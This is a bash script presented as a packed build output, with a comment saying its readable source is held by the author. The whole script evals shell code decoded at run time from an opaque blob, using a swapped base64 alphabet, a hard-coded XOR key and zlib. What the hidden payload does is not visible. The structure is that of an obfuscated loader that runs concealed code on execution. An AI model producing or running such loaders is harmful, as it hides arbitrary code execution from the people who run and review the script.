#!/usr/bin/env bash
# Packed script — generated by Scripts/build/pack.py. Do not edit.
# (The readable source lives with the project author.)
eval "$(python3 -c "
import base64, zlib
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = 'qZ3mK9xVdWyB1pS7nRc8LtJfE0hUoI4aXwG6vN2bY5rQiOgMlAjszDkCePFuHT+/'
k = b'K\x19~\x825\xc1\no\x91-'
p = '1H7sz/F733FZvERShXvLLoBZsAAtm8IGiR6aaBZWvenBA9cbSJqZpoExbPf7P7spN+b8E0ak0Asagi8XmnMGsTSBBcz+VhAfsyR4eP25FlKsjo4JdkcubHppdeHouTb3gVfbNZF1H4OWUfNgOwKWb1GRuNTnjXjhhgFzFgBesZBw1styTPjpI9hl2Wo4IXgVt5XDoisjwuoehzjDCrxhaJhpr/eohfatB4fprwB+Q6op/qBKS1CCLNTXLVX15f51Vqqs4jHGaDf0bScNAeQuYlm7HH1FxriL5n4f5RomSXKZCyDc6c1Wq6VT15shIK2SAMSsAI3ll3LvNwUPJlgyGWXfA7hjCOapAoUDiU/s91E4q4MUOdgtMecNCWUMiTIgpbt77NC7kBG6lkBoj6z0qZqObaVHeIauWM1h2U+4nHLzdUGHpJiDCbl='.translate(str.maketrans(c, a))
raw = base64.b64decode(p)
d = bytes(v ^ k[i % len(k)] for i, v in enumerate(raw))
import sys; sys.stdout.write(zlib.decompress(d).decode('utf-8'))
")"
